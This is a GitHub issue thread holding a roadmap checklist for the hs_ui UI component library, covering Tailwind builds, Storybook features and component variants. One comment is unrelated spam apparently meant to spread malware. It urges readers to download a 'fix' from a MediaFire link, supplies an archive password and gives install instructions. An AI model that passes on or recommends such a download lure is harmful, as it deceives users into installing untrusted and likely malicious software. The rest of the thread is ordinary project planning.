### ISSUE TITLE
Roadmap

### ISSUE THREAD

**Issue by Panthevm** [HealthSamurai/hs_ui#1]
## Tailwind
- [x] Build CSS file from source files
- [x] Sync design tokens with Figma

## Storybook
- [x] Implement component property controls
- [x] Accessibility Test
- [x] Dark mode control
- [ ] Visual tests
- [ ] Component tests
- [x] Deploy a public instance

## Documentation & Support
- [ ] "How to Use" Guide 

## Molecules
- [x] Button
  - [x] Primary
  - [x] Critical
  - [x] Secondary
  - [x] Tertiary
  - [x] Slim
  - [x] XS
  - [x] XS Red
 - [x] Input
   - [x] Single line
   - [x] Dropdown
 - [x] Swithces
   - [x] ContentExpand
   - [x] Switch
   - [x] Radio
 - [ ] Navigation
   - [x] Breadcrumbs
   - [ ] Tab  
 - [x] List
   - [x] ListItem
- [x] Menu
  - [x] Separator
  - [x] Item
  - [ ] Logo
 - [x] Messages
   - [x] Form Alert
   - [x] Form Warning
   - [x] Form Info
   - [x] Default

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikitaSinc** [comment]
Check license

**Comment by NikitaSinc** [comment]
Check customisation
